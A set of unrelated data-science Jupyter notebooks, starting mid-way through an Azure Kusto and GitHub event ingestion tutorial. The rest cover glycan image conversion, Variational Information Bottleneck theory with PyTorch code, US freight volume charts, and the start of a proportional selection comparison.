To get the data from GitHub to Event Hub, I've created the following Python ingestion scripts that run on Alpine Docker. Check out the code [here](https://github.com/aribornstein/github2eventhub) — this can be reused in new projects.
```
!az container create -g kustodeploymenttest --name gh2eh --image abornst/gh2eh --cpu 1 --memory 1 \
--environment-variables "eh_address"="amqps://kusto-github-EHNS.servicebus.windows.net/kusto-github-EH"\
"eh_user"="kusto-github-EH-key" "eh_key"="primaryKey see above" \
"gh_token"="GitHub Token See instructions above"
```
## 14. Lets start seeing how many events we've pulled from Github let's give it ~5-20min to populate
```
QUERY = "GithubEvent | count"
RESPONSE = KUSTO_CLIENT.execute_query(DB_NAME, QUERY)
dataframe_from_result_table(RESPONSE.primary_results[0])
```
## 15. Now That we have our Data Let's try some interesting queries and use pandas and matplotlib to plot them.
### What are the 5 most popular Repos on Github?
```
QUERY = """let watchedRepos =
GithubEvent
| where Type == "WatchEvent"
| extend RepoName = tostring(Repo.name)
| summarize hint.shufflekey=RepoName WatchEvents=count() by RepoName;
let issuesRepos =
GithubEvent
| where Type in ("IssueCommentEvent", "IssuesEvent")
| extend RepoName = tostring(Repo.name)
| summarize hint.shufflekey=RepoName IssueEvents=count() by RepoName;
watchedRepos
| join hint.shufflekey=RepoName (issuesRepos) on RepoName
| extend Popularity=(WatchEvents * 0.3) + (IssueEvents*0.7)
| top 5 by Popularity
| project RepoName, Popularity """
RESPONSE = KUSTO_CLIENT.execute_query(DB_NAME, QUERY)
dataframe_from_result_table(RESPONSE.primary_results[0]).plot.bar(x='RepoName')
```
# Challenge
Use the service and [query language](https://docs.microsoft.com/azure/kusto/query/?WT.mc_id=code-github-abornst) to find the following and tweet your results to @pythiccoder
- What are the most popular programming languages of the last year (by watch events)?
- What is the sentiment over time of the top 10 programming languages on Github?
- Who are the top most active users by country?
- Who are the github users with the most contributions to the top 50 most popular repos?
| github_jupyter |
# dataframe of glycan images
Lazily create a dataframe containing the images for all the glycans in array v 5.0.
This may be useful for analysis later.
```
%reset -f
## import all required dependencies
# standard imports
import urllib2
import os
import sys
import json
import StringIO
import pickle
# dataframe and numerical
import pandas as pd
import numpy as np
# plotting
import matplotlib.pyplot as plt
%matplotlib inline
# plotting params
from matplotlib import rcParams
rcParams["figure.figsize"] = 10, 8
#scipy
from scipy import stats
from scipy.special import erf
from scipy import sqrt
# glypy
import glypy
from glypy.plot import plot
from glypy.io import glycoct
# other modules
sys.path.append('../scripts/')
import post_glycan_convert as pgc
# Use an example array - using the galectin example
samples_in="../data/galectin-3/galectin-3_5.0_human.json"
results_dir = "../results/galectin-3/"
dataframe_out=results_dir+"dataframes_galectin.pkl"
dataframefile=dataframe_out
# Check whether or not the dataframes exist
subdir="./"
dataframefile=dataframe_out
if not os.path.isfile(dataframefile):
print "calling the notebook that loads the data"
%run download_cfg_for_galectin.ipynb
with open(os.path.join(subdir, dataframefile)) as f:
dataframes = pickle.load(f)
dataframes[0]["sample"]
frame=dataframes[0]["dataframe"]
frame.head()
# create a data frame with the glycan and the spacer as separate columns
Structure="Structure on Masterlist"
df=pd.concat([frame["Chart Number"], frame[Structure]], axis=1)
df.head()
#frame["Structure"]
df[Structure].str.extract('(.*-)')
df["Glycan"]=df[Structure].str.extract('(.*-)').str.strip('-')
#df['Structure'].str.extract('(-Sp.+?$)')
df["Spacer"]=df[Structure].str.split('.*-').str[1]
df
# create a function that plots using glypy
def plotter(func):
    """Decorator that passes through *func*'s return value unchanged.

    The plotting/printing side effects are currently commented out, so this
    is effectively an identity wrapper; it is kept as a hook for optionally
    plotting (or logging) each converted glycan.
    """
    from functools import wraps

    @wraps(func)  # preserve the wrapped function's name/docstring
    def wrapper(*args, **kwargs):
        res = func(*args, **kwargs)
        # print func.__name__, args, kwargs
        # plot(res, label=True)  # glypy plot of the converted structure
        return res
    return wrapper
@plotter
def get_gly_iupac(iupacstring):
    """Convert an IUPAC glycan string to a glypy GlycoCT structure.

    Pipeline: IUPAC text -> KCF (via the RINGS converter wrapped by
    post_glycan_convert) -> GlycoCT text -> glypy structure.

    On success the parsed glypy structure is returned.  On any conversion
    failure the original input string is returned unchanged, so callers can
    spot failed entries (they remain plain strings).  Not all IUPAC inputs
    survive the IUPAC -> KCF -> GlycoCT round trip (noted later in the
    notebook), hence the best-effort fallback.
    """
    try:
        kchandle = StringIO.StringIO(iupacstring)
        kcf = pgc.mechanise_glycan_convert(kchandle, "Kcf", "text")
        kchandle2 = StringIO.StringIO(kcf)
        gct = pgc.mechanise_glycan_convert(kchandle2, "Glycoct", "text")
        return glycoct.loads(gct)
    except Exception:
        # except Exception (not bare except) so KeyboardInterrupt/SystemExit
        # still propagate during long conversion runs.
        return iupacstring
high_binders_from_paper=[372,
543,
545,
547,
549,
550,
551,
565,
566,
569,
576,
577,
578,
579,
580,
581,
582,
583,
584,
585,
586,
587,
588,
589]
highbinders_df = df[df["Chart Number"].isin(high_binders_from_paper)]
#highbinders_df["glycoct"]=get_gly_iupac(highbinders_df["Glycan"])
highbinders_df["glycoct"]=highbinders_df["Glycan"]
highbinders_df.head()
highbinders_df
highbinders_df["glycoct"]=highbinders_df["Glycan"]
# create a function called to http://chrisalbon.com/python/pandas_apply_operations_to_dataframes.html
# maps apply to the showl frame....
def map_glycoct(x):
    # Thin adapter so get_gly_iupac can be used with pandas Series.map;
    # x is one IUPAC glycan string from the "Glycan" column.
    return get_gly_iupac(x)
#. commenting out for now as takes a while. plus not all conversions occur
#newslice = highbinders_df['glycoct'].map(map_glycoct) # http://chrisalbon.com/python/pandas_apply_operations_to_dataframes.html
# Not always able to get iupac-> kcf-> glycoct
# why not just pull imaged from kcf-> image
import post_kcf_to_image as pki
def get_gly_image(iupacstring):
    """Render an IUPAC glycan string to a base64-encoded PNG string.

    Pipeline: IUPAC text -> KCF (RINGS converter) -> image HTML via the
    RINGS kcf-to-image service; the first image in the returned HTML is
    base64-encoded (Python 2 ``str.encode("base64")``).

    On any failure the raw IUPAC string is returned unchanged, mirroring
    the best-effort behaviour of get_gly_iupac.
    """
    try:
        kchandle = StringIO.StringIO(iupacstring)
        kcf = pgc.mechanise_glycan_convert(kchandle, "Kcf", "text")
        kchandle2 = StringIO.StringIO(kcf)
        gct = pki.post_rings_kcf_to_image(kchandle2)
        return pki.get_first_image_from_html(gct).encode("base64")
    except Exception:
        # except Exception (not bare except) so KeyboardInterrupt/SystemExit
        # still propagate during long conversion runs.
        return iupacstring
aimg= get_gly_image(df["Glycan"][372])
from IPython.display import Image
Image(aimg)
highbinders_from_analysis={543,
547,
549,
550,
551,
565,
566,
569,
577,
578,
579,
580,
581,
582,
588,
589}
import urllib
highbinders2_df = df[df["Chart Number"].isin(highbinders_from_analysis)]
highbinders2_df["Image"]=highbinders2_df["Glycan"]
# create a function called to http://chrisalbon.com/python/pandas_apply_operations_to_dataframes.html
# maps apply to the showl frame....
def map_image(x):
    # Adapter for pandas Series.map: render glycan string x to an inline
    # HTML <img> tag carrying a base64-encoded PNG data URI.  The trailing
    # newline is stripped and the payload URL-quoted so it survives
    # embedding in the attribute value.
    return '<html><img src="data:image/png;base64,'+urllib.quote(get_gly_image(x).rstrip('\n'))+'"/></html>'
newslice = highbinders2_df['Image'].map(map_image) # http://chrisalbon.com/python/pandas_apply_operations_to_dataframes.html
pd.set_option('display.max_colwidth', 10000)
from IPython.display import Image, HTML
newslice
HTML(newslice.to_frame().to_html(escape=False))
def get_gly_kcf(iupacstring):
    """Convert an IUPAC glycan string to KCF text via the RINGS converter.

    Returns the KCF string on success; on any failure the raw IUPAC string
    is returned unchanged (best-effort, like get_gly_iupac).
    """
    try:
        kchandle = StringIO.StringIO(iupacstring)
        kcf = pgc.mechanise_glycan_convert(kchandle, "Kcf", "text")
        return kcf
    except Exception:
        # except Exception (not bare except) so KeyboardInterrupt/SystemExit
        # still propagate during long conversion runs.
        return iupacstring
highbinders2_df["KCF"]=highbinders2_df["Glycan"]
# create a function called to http://chrisalbon.com/python/pandas_apply_operations_to_dataframes.html
# maps apply to the showl frame....
def map_kcf(x):
    # Adapter for pandas Series.map: convert one IUPAC glycan string from
    # the "Glycan" column to KCF text.
    return get_gly_kcf(x)
newslice2 = highbinders2_df['KCF'].map(map_kcf) # http://chrisalbon.com/python/pandas_apply_operations_to_dataframes.html
kcfdict=newslice2.to_dict()
kcfdict.keys()
kcflist=[]
for key in kcfdict:
kcflist.append(kcfdict[key])
print "".join(kcflist) # can paste this into http://rings.t.soka.ac.jp/cgi-bin/tools/MCAW/mcaw_index.pl
```
| github_jupyter |
# VIB: Theory
**Notation**
* $x$ be our input source,
* $y$ be our target
* $z$ be our latent representation
### Mutual Information
Mutual information (MI) measures the amount of information obtained about one random variable after observing another random variable. Formally given two random variables $x$ and $y$ with joint distribution $p(x,y)$ and marginal densities $p(x)$ and $p(y)$ their MI is defined as the KL-divergence between the joint density and the product of their marginal densities
$$\begin{align}
I(x;y)&=I(y;x)\\
&=KL\Big(p(x,y)||p(x)p(y)\Big)\\
&=\mathbb{E}_{(x,y)\sim p(x,y)}\bigg[\log\frac{p(x,y)}{p(x)p(y)}\bigg]\\
&=\int dxdyp(x,y)\log\frac{p(x,y)}{p(x)p(y)}
\end{align}$$
### Information Bottlenecks
IB regards supervised learning as a representation learning problem, seeking a stochastic map from input data
$x$ to some latent representation $z$ that can still be used to predict the labels $y$ , under a constraint on its total complexity.
We assume our joint distribution $p(x,y,z)$ can be factorised as follows:
$$p(x,y,z)=p(z\mid x,y)p(y\mid x)p(x)=p(z\mid x)p(y\mid x)p(x)$$
which corresponds to the following Markov Chain
$$y\rightarrow x\rightarrow z$$
Our goal is to learn an encoding that is maximally informative about our target $y$ measured by $I(y;z)$. We could always ensure a maximally informative representation by taking the identity encoding $x=z$ which is not useful. Instead we apply a constraint such that the objective is
$$\begin{alignat}{3}
&\underset{}{\text{max }} & \quad & I(y;z)\\
&\text{subject to } & \quad & I(x;z)\leq I_c
\end{alignat}$$
where $I_c$ is the information constraint. The Lagrangian of the above constrained optimisation problem which we would like to **maximise** is
$$\begin{align}
L_{IB}&=I(y;z)-\beta \big(I(x;z)-I_c\big)\\
&=I(y;z)-\beta I(x;z)
\end{align}$$
where $\beta\geq0$ is a Lagrange multiplier.
* Intuitively the first term encourages $z$ to be predictive of $y$, whilst the second term encourages $z$ to "forget" $x$.
* In essence, IB principle explicitly enforces the learned representation $z$ to only preserve the information in $x$ that is useful to the prediction of $y$, i.e., the minimal sufficient statistics of $x$ w.r.t. $y$.
### Variational Information Bottlenecks
**The first term**<br>
We can write out the terms in the objective as
$$I(y;z)=\int dydz p(y,z)\log \frac{p(y,z)}{p(y)p(z)}=\int dydz p(y,z)\log \frac{p(y\mid z)}{p(y)}$$
where $p(y\mid z)$ is defined as
$$p(y\mid z)=\int dx \frac{p(x,y,z)}{p(z)}=\int dx \frac{p(z\mid x)p(y\mid x)p(x)}{p(z)}$$
which is intractable. Let $q(y\mid z)$ be a variational approximation to $p(y\mid z)$. By using the KL divergence we can obtain a lower bound on $I(y;z)$
$$KL\Big(p(y\mid z)|| q(y\mid z)\Big)\geq0\Longrightarrow \int dy p(y\mid z)\log p(y\mid z)\geq \int dy p(y\mid z)\log q(y\mid z)$$
Hence we have that
$$\begin{align}
I(y;z)&= \int dydz p(y,z)\log p(y\mid z) - \int dy p(y)\log p(y)\\
&\geq \int dydz p(y, z)\log q(y\mid z) - \int dy p(y)\log p(y)\\
&=\int dxdydz p(z\mid x)p(y\mid x)p(x)\log q(y\mid z)
\end{align}$$
where the entropy of the labels $H(y)=- \int dy p(y)\log p(y)$ is independent of our optimisation and so can be ignored.
**The second term**<br>
We can write out the second term in the objective as
$$I(x;z)=\int dxdz p(x,z)\log \frac{p(x,z)}{p(x)p(z)}=\int dxdz p(x,z)\log \frac{p(z\mid x)}{p(z)}$$
Let $q(z)$ be a variational approximation to the marginal $p(z)$. By using the KL divergence we can obtain an upper bound on $I(x;z)$ as
$$KL\Big(p(z)|| q(z)\Big)\geq0\Longrightarrow \int dz p(z)\log p(z)\geq \int dz p(z)\log q(z)$$
Hence we have
$$\begin{align}
I(x;z)&=\int dxdz p(x,z)\log p(z\mid x) - \int dz p(z)\log p(z)\\
&\leq\int dxdz p(x,z)\log p(z\mid x) - \int dz p(z)\log q(z)\\
&=\int dxdz p(x)p(z\mid x)\log \frac{p(z\mid x)}{q(z)}
\end{align}$$
### Loss Function
Combining the above two bounds we can rewrite the Lagrangian which we would like to **maximise** as
$$\begin{align}
L_{IB}&=I(y;z)-\beta I(x;z)\\
&\geq \int dxdydz p(z\mid x)p(y\mid x)p(x)\log q(y\mid z) -\beta\int dxdz p(x)p(z\mid x)\log \frac{p(z\mid x)}{q(z)}\\
&=\int dxdydz p(z\mid x)p(y,x)\log q(y\mid z) -\beta\int dxdydz p(z\mid x)p(x,y)KL\Big(p(z\mid x)||q(z)\Big)\\
&=\mathbb{E}_{(x,y)\sim p(x,y), z\sim p(z\mid x)}\bigg[\log q(y\mid z)-\beta KL\Big(p(z\mid x)||q(z)\Big)\bigg]\\
&=J_{IB}
\end{align}$$
To compute the lower bound in practice make the following assumptions:
* We approximate $p(x,y)=p(x)p(y\mid x)$ using the empirical data distribution $p(x,y)=\frac{1}{n}\sum^{n}_{i=1}\delta_{x_i}(x)\delta_{y_i}(y)$ such that
$$\begin{align}
J_{IB}&= \int dxdydz p(z\mid x)p(y\mid x)p(x)\log q(y\mid z) -\beta\int dxdz p(x)p(z\mid x)\log \frac{p(z\mid x)}{q(z)}\\
&\approx \frac{1}{n}\sum^{n}_{i=1}\bigg[\int dz p(z\mid x_i)\log q(y_i\mid z)-\beta\int dz p(z\mid x_i)\log \frac{p(z\mid x_i)}{q(z)}\bigg]\\
&=\frac{1}{n}\sum^{n}_{i=1}\bigg[\int dz p(z\mid x_i)\log q(y_i\mid z)- \beta KL\Big(p(z\mid x_i)|| q(z)\Big) \bigg]
\end{align}$$
* By using an encoder parameterised as multivariate Gaussian
$$p_\phi(z\mid x)=\mathcal{N}\bigg(z;\boldsymbol{\mu}_\phi(x), \boldsymbol{\Sigma}_\phi(x)\bigg)$$
then we can use the reparameterisation trick such that $z=g_\phi(\epsilon,x)$ which is a deterministic function of $x$ and the Gaussian random variable $\epsilon\sim p(\epsilon)=\mathcal{N}(0,I)$.
* We assume that our choice of parameterisation of $p(z\mid x)$ and $q(z)$ allow for computation of an analytic KL-divergence,
Thus the final objective we would **minimise** is
$$J_{IB}=\frac{1}{n}\sum^{n}_{i=1}\Bigg[\beta KL\Big(p(z\mid x_i)|| q(z)\Big) - \mathbb{E}_{\epsilon\sim p(\epsilon)}\Big[\log q\big(y_i\mid g_\phi(\epsilon,x)\big)\Big]\Bigg]$$
where we have that
* $p_\phi(z\mid x)$ is the encoder parameterised as a multivariate Gaussian
$$p_\phi(z\mid x)=\mathcal{N}\bigg(z;\boldsymbol{\mu}_\phi(x), \boldsymbol{\Sigma}_\phi(x)\bigg)$$
* $q_\theta(y\mid z)$ is the decoder parameterised as an independent Bernoulli for each element $y_j$ of $y$ (for binary data)
$$q_\theta(y_j\mid z)=\text{Ber}\Big(\mu_\theta(z)\Big)$$
* $q(z)$ is the approximated latent marginal often fixed to a standard normal.
$$q_\theta(z)=\mathcal{N}\Big(z;\mathbf{0},\mathbf{I}_k\Big)$$
By using our parameterisation of the decoder $q_\theta(y\mid z)$ as an indepenedent Bernoulli we have that
$$-\log q_\theta(y\mid z)=-\Big[y\log \hat{y} + (1-y)\log(1-\hat{y})\Big]$$
i.e. this is the Binary Cross Entropy loss.
### Connection to Variational Autoencoder
The VAE is a special case of an unsupervised version of VIB with $\beta=1.0$ as they consider the objective
$$L=I(x;z)-\beta I(i;z)$$
where the aim is to take our data $x$ and maximise the mutual information contained in some encoding $z$, while restricting how much information we allow our representation to contain about the identity of each data element in our sample $i$. While this objective takes the same mathematical form as that of a Variational Autoencoder, the interpretation of the objective is very different:
* In the VAE, the model starts life as a generative model with a defined prior $p(z)$ and stochastic decoder $p(x|z)$ as part of the model, and the encoder $q(z|x)$ is created to serve as a variational approximation to the true posterior $p(z|x) = \frac{p(x|z)}{p(z)p(x)}$.
* In the VIB approach, the model is originally just the stochastic encoder $p(z|x)$, and the decoder $q(x|z)$ is the variational approximation to the true $p(x|z) = \frac{p(z|x)p(x)}{p(z)}$ and $q(z)$ is the variational approximation to the marginal $p(z) =\int dx p(x)p(z|x)$.
### References
* Original Deep VIB paper: https://arxiv.org/abs/1612.00410
# VIB: Code
The code is almost identical to my VAE implementation found here: [torch_vae](https://github.com/udeepam/vae/blob/master/notebooks/vae.ipynb)
**References:**
* https://github.com/makezur/VIB_pytorch
* https://github.com/sungyubkim/DVIB
* https://github.com/1Konny/VIB-pytorch
```
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import matplotlib.pyplot as plt
import time
from collections import defaultdict
import torch
import torch.nn as nn
from torch.nn import functional as F
import torch.utils.data as data_utils
# Device Config
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
# Fix random seeds for reproducibility
seed = 73
torch.manual_seed(seed)
np.random.seed(seed)
```
## Load MNIST Dataset
```
# import torchvision
# from torchvision import transforms
# from torchvision.datasets import MNIST
# # 60000 tuples with 1x28x28 image and corresponding label
# data = MNIST('data',
# train=True,
# download=True,
# transform = transforms.Compose([transforms.ToTensor()]))
# # Split data into images and labels
# x_train = data.train_data
# y_train = data.train_labels
# # Scale images from [0,255] to [0,+1]
# x_train = x_train.float() / 255
# # Save as .npz
# np.savez_compressed('data/mnist_train',
# a=x_train,
# b=y_train)
# # 10000 tuples with 1x28x28 image and corresponding label
# data = MNIST('data',
# train=False,
# download=True,
# transform = transforms.Compose([transforms.ToTensor()]))
# # Split data into images and labels
# x_test = data.test_data
# y_test = data.test_labels
# # Scale images from [0,255] to [0,+1]
# x_test = x_test.float() / 255
# # Save as .npz
# np.savez_compressed('data/mnist_test',
# a=x_test,
# b=y_test)
# Load MNIST data locally
train_data = np.load('data/mnist_train.npz')
x_train = torch.Tensor(train_data['a'])
y_train = torch.Tensor(train_data['b'])
n_classes = len(np.unique(y_train))
test_data = np.load('data/mnist_test.npz')
x_test = torch.Tensor(test_data['a'])
y_test = torch.Tensor(test_data['b'])
# Visualise data
plt.rcParams.update({'font.size': 16})
fig, axes = plt.subplots(1,4, figsize=(35,35))
imx, imy = (28,28)
labels = [0,1,2,3]
for i, ax in enumerate(axes):
visual = np.reshape(x_train[labels[i]], (imx,imy))
ax.set_title("Example Data Image, y="+str(int(y_train[labels[i]])))
ax.imshow(visual, vmin=0, vmax=1)
plt.show()
```
## Models
```
class DeepVIB(nn.Module):
    """Deep Variational Information Bottleneck classifier.

    Encodes a flattened image into a Gaussian latent z = mu + std * eps
    (reparameterisation trick) and decodes z into class logits with a
    single linear layer.
    """

    def __init__(self, input_shape, output_shape, z_dim):
        """
        Arguments:
        ----------
        input_shape : `int`
            Flattened size of image. (Default=784)
        output_shape : `int`
            Number of classes. (Default=10)
        z_dim : `int`
            The dimension of the latent variable z. (Default=256)
        """
        super(DeepVIB, self).__init__()
        self.input_shape = input_shape
        self.output_shape = output_shape
        self.z_dim = z_dim
        # Encoder trunk: two 1024-unit ReLU layers, then separate heads
        # for the Gaussian mean and the (pre-softplus) scale.
        self.encoder = nn.Sequential(
            nn.Linear(input_shape, 1024),
            nn.ReLU(inplace=True),
            nn.Linear(1024, 1024),
            nn.ReLU(inplace=True),
        )
        self.fc_mu = nn.Linear(1024, self.z_dim)
        self.fc_std = nn.Linear(1024, self.z_dim)
        # Decoder: one linear map from latent space to class logits.
        self.decoder = nn.Linear(self.z_dim, output_shape)

    def encode(self, x):
        """Map a flat batch [batch_size, input_shape] to (mu, std)."""
        hidden = self.encoder(x)
        mu = self.fc_mu(hidden)
        # Shifting by -5 before softplus makes std start small; softplus
        # keeps it strictly positive.
        std = F.softplus(self.fc_std(hidden) - 5, beta=1)
        return mu, std

    def decode(self, z):
        """Map latents [batch_size, z_dim] to class logits."""
        return self.decoder(z)

    def reparameterise(self, mu, std):
        """Sample z = mu + std * eps with eps ~ N(0, I)."""
        noise = torch.randn_like(std)
        return noise * std + mu

    def forward(self, x):
        """Run encode -> sample -> decode on images [batch_size, 28, 28].

        Returns (logits, mu, std) so the loss can use both the prediction
        and the posterior parameters.
        """
        flat = x.view(x.size(0), -1)
        mu, std = self.encode(flat)
        latent = self.reparameterise(mu, std)
        return self.decode(latent), mu, std
```
## Training
```
# Hyperparameters
beta = 1e-3            # KL weight in the VIB objective
z_dim = 256            # latent dimension
epochs = 200
batch_size = 128
learning_rate = 1e-4
decay_rate = 0.97      # ExponentialLR gamma (applied every 2 epochs below)
# Create DataLoader over (image, label) training pairs.
train_dataset = data_utils.TensorDataset(x_train, y_train)
train_dataloader = torch.utils.data.DataLoader(train_dataset,
                                               batch_size=batch_size,
                                               shuffle=True)
# Loss function: Cross Entropy Loss (CE) + beta*KL divergence
def loss_function(y_pred, y, mu, std, beta_weight=None):
    """VIB objective: per-sample average of CE + beta * KL over the batch.

    Parameters
    ----------
    y_pred : Tensor [batch_size, n_classes]
        Class logits.
    y : Tensor [batch_size]
        Integer class labels (``F.cross_entropy`` expects class indices,
        not one-hot rows; the original docstring said [batch_size, 10]).
    mu, std : Tensor [batch_size, z_dim]
        Parameters of the Gaussian posterior q(z|x).
    beta_weight : float, optional
        KL weight. Defaults to the module-level hyperparameter ``beta``
        (read at call time, exactly as before), so existing 4-argument
        callers are unaffected while tests can pass a weight explicitly.
    """
    if beta_weight is None:
        beta_weight = beta  # module-level hyperparameter
    CE = F.cross_entropy(y_pred, y, reduction='sum')
    # Closed-form KL( N(mu, std^2) || N(0, I) ), summed over batch and z_dim.
    KL = 0.5 * torch.sum(mu.pow(2) + std.pow(2) - 2*std.log() - 1)
    return (beta_weight*KL + CE) / y.size(0)
# Initialize Deep VIB: input is the flattened image size, output n_classes.
vib = DeepVIB(np.prod(x_train[0].shape), n_classes, z_dim)
# Optimiser with exponential LR decay (scheduler stepped manually below).
optimiser = torch.optim.Adam(vib.parameters(), lr=learning_rate)
scheduler = torch.optim.lr_scheduler.ExponentialLR(optimizer=optimiser, gamma=decay_rate)
# Send to GPU if available
vib.to(device)
print("Device: ", device)
print(vib)
# Training loop: accumulates per-epoch loss/accuracy in `measures`.
measures = defaultdict(list)
start_time = time.time()
# put Deep VIB into train mode
vib.train()
for epoch in range(epochs):
    epoch_start_time = time.time()
    # exponential decay of learning rate every 2 epochs
    if epoch % 2 == 0 and epoch > 0:
        scheduler.step()
    batch_loss = 0
    batch_accuracy = 0
    for _, (X,y) in enumerate(train_dataloader):
        X = X.to(device)
        y = y.long().to(device)  # labels were stored as floats; CE needs int64
        # Zero accumulated gradients
        vib.zero_grad()
        # forward pass through Deep VIB
        y_pred, mu, std = vib(X)
        # Calculate loss
        loss = loss_function(y_pred, y, mu, std)
        # Backpropagation: calculating gradients
        loss.backward()
        # Update parameters of generator
        optimiser.step()
        # Save loss per batch (multiply back by the batch size so the epoch
        # figure below is a true per-sample average)
        batch_loss += loss.item()*X.size(0)
        # Save accuracy per batch
        y_pred = torch.argmax(y_pred,dim=1)
        batch_accuracy += int(torch.sum(y == y_pred))
    # Save losses per epoch
    measures['total_loss'].append(batch_loss / len(train_dataloader.dataset))
    # Save accuracy per epoch
    measures['accuracy'].append(batch_accuracy / len(train_dataloader.dataset))
    print("Epoch: {}/{}...".format(epoch+1, epochs),
          "Loss: {:.4f}...".format(measures['total_loss'][-1]),
          "Accuracy: {:.4f}...".format(measures['accuracy'][-1]),
          "Time Taken: {:,.4f} seconds".format(time.time()-epoch_start_time))
print("Total Time Taken: {:,.4f} seconds".format(time.time()-start_time))
```
## Testing
```
# Create DataLoader over the held-out test set.
test_dataset = data_utils.TensorDataset(x_test, y_test)
test_dataloader = torch.utils.data.DataLoader(test_dataset,
                                              batch_size=batch_size,
                                              shuffle=True)
measures = defaultdict(int)
start_time = time.time()
# put Deep VIB into eval mode (note: forward() still samples z via
# reparameterise, so the logits remain stochastic)
vib.eval()
with torch.no_grad():
    for _, (X,y) in enumerate(test_dataloader):
        X = X.to(device)
        y = y.long().to(device)
        # forward pass through Deep VIB
        y_pred, mu, std = vib(X)
        y_pred = torch.argmax(y_pred,dim=1)
        measures['accuracy'] += int(torch.sum(y == y_pred))
print("Accuracy: {:.4f}...".format(measures['accuracy']/len(test_dataloader.dataset)),
      "Time Taken: {:,.4f} seconds".format(time.time()-start_time))
```
| github_jupyter |
# US Air Freight and Waterway Volumes
---
A look at air and domestic waterway freight volumes, according to the US DOT Bureau of Transportation Statistics.
```
import pandas as pd
import altair as alt
from os import environ
import re
# Skip in CI: the scrape below needs a manual, interactive run.
if environ.get("GITHUB_WORKFLOW"):
    raise RuntimeError("Requires manual updates")
# https://www.transtats.bts.gov/osea/seasonaladjustment/
# IPython shell magic: fetch the BTS page whose embedded JS holds the series.
af_res = !curl -k 'https://transtats.bts.gov/osea/seasonaladjustment/?PageVar=AIR_RTMFM'
#print("\n".join(af_res))
# Keep only the JS lines defining the chart series, then scrape
# (timestamp, value) pairs out of them with a regex.
af_raw = [r for r in af_res if "series:" in r]
df_af = pd.DataFrame.from_records(re.findall("'(\d\d/\d\d/\d\d\d\d \d\d:\d\d:\d\d)'\), y: (\d+)", "".join(af_raw)),
                                  columns=["date", "tonMiles"])
df_af = df_af.dropna()
df_af['dt'] = df_af.date.apply(pd.to_datetime)
#df_af.head()
```
## US Airline Freight
```
# Line chart of raw monthly air-freight volume.
alt.Chart(df_af).mark_line().encode(
    alt.X('dt:T', axis=alt.Axis(title='')),
    alt.Y('tonMiles:Q', axis=alt.Axis(title='Volume [ton-miles]'))
).properties(
    title='US Air Freight Volume',
    width=700,
    height=400
)
# Year-over-year % change (12-period lag on a monthly series).
df_af['change'] = df_af.set_index('dt')['tonMiles'].apply(int).pct_change(12).apply(lambda v: v * 100).values
c = alt.Chart(df_af).mark_bar(size=2).encode(
    alt.X('dt:T', axis=alt.Axis(title='')),
    alt.Y('change:Q', axis=alt.Axis(title='Year-over-Year Change [%]')),
    tooltip=[alt.Tooltip('dt:T', title='Date'), alt.Tooltip('change:Q', title='% Change', format=',.01f')],
    # Negative growth in salmon, positive in blue.
    color=alt.condition(f"datum.change < 0",
                        alt.value('lightsalmon'),
                        alt.value('royalblue')
                        ),
).properties(
    title='US Air Freight Volume Growth',
    width=750,
    height=400
)
#c.save('transportation-air-waterway.png')
c.display()
```
## Internal US Waterways Shipping
```
# Same scrape as the air-freight cell, for the domestic waterborne series.
wwf_res = !curl -k 'https://transtats.bts.gov/osea/seasonaladjustment/?PageVar=WATERBORNE'
wwf_raw = [r for r in wwf_res if "series:" in r]
df_wwf = pd.DataFrame.from_records(re.findall("'(\d\d/\d\d/\d\d\d\d \d\d:\d\d:\d\d)'\), y: (\d+)", "".join(wwf_raw)),
                                   columns=["date", "megaShortTons"])
df_wwf = df_wwf.dropna()
df_wwf['dt'] = df_wwf.date.apply(pd.to_datetime)
#df_wwf.head()
# Raw monthly volume line chart.
alt.Chart(df_wwf).mark_line().encode(
    alt.X('dt:T', axis=alt.Axis(title='')),
    alt.Y('megaShortTons:Q', axis=alt.Axis(title='Volume [Million short tons]'))
).properties(
    title='US Internal Waterways Shipping Volume',
    width=700,
    height=400
)
# Year-over-year % change, coloured by sign.
df_wwf['change'] = df_wwf.set_index('dt')['megaShortTons'].apply(int).pct_change(12).apply(lambda v: v * 100).values
alt.Chart(df_wwf).mark_bar(size=2).encode(
    alt.X('dt:T', axis=alt.Axis(title='')),
    alt.Y('change:Q', axis=alt.Axis(title='Year-over-Year Change [%]')),
    tooltip=[alt.Tooltip('dt:T', title='Date'), alt.Tooltip('change:Q', title='% Change', format=',.01f')],
    color=alt.condition(f"datum.change < 0",
                        alt.value('lightsalmon'),
                        alt.value('royalblue')
                        ),
).properties(
    title='US Internal Waterways Volume Growth',
    width=750,
    height=400
)
```
| github_jupyter |
Fast Proportional Selection
===
[RETWEET]
Proportional selection -- or, roulette wheel selection -- comes up frequently when developing agent-based models. Based on the code I have read over the years, researchers tend to write proportional selection as either a linear walk or a bisecting search. I compare the two approaches, then introduce Lipowski and Lipowska's [stochastic acceptance algorithm](http://arxiv.org/abs/1109.3627). For most of our uses, I argue that their algorithm is a better choice.
See also: This IPython notebook's [repository on GitHub](https://github.com/jbn/fast_proportional_selection).
Preliminaries
---
I will only use Python's internal random module for random number generation. I include numpy and pandas convenience only when running demos. I import seaborne because it overrides some matplotlib defaults in a pretty way.
```
import random
from bisect import bisect_left
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import seaborn as sns
%matplotlib inline
```
A Proportional Selection Base Class
---
I am interested in testing how the different algorithms perform when *implemented* and *used*. Algorithmic analysis gives us asymptotic estimations. From these, we know which algorithm should be the fastest, in the limit. But, for trivial values of $n$, asymptotics can be misleading. $O(1)$ is not always faster than $O(n)$. $O(1)$ is really $O(c)$, and $c$ can be very costly!
I use a base class, `PropSelection`, to generate an equal playing field. This class takes the size of the vector of frequencies representing a distribution. I use frequencies because they are more natural to think about, and are easier to update. The client calls the `normalize` method any time the underlying frequencies change. Call the object like a dictionary to update a frequency.
```
class PropSelection(object):
    """Shared interface for the proportional-selection strategies.

    Holds a length-n vector of integer frequencies. Subclasses implement
    ``__setitem__`` (to maintain their own bookkeeping) and ``sample``;
    ``normalize`` is a hook that only the CDF-based strategy overrides.
    """

    def __init__(self, n):
        self._n = n
        self._frequencies = [0 for _ in range(n)]

    def copy_from(self, values):
        """Bulk-load frequencies through ``self[i] = x`` so that subclass
        bookkeeping (totals, maxima, ...) is kept up to date."""
        assert len(values) == self._n
        for index in range(self._n):
            self[index] = values[index]

    def __getitem__(self, i):
        return self._frequencies[i]

    def normalize(self):
        """No-op hook; clients call this after the frequencies change."""
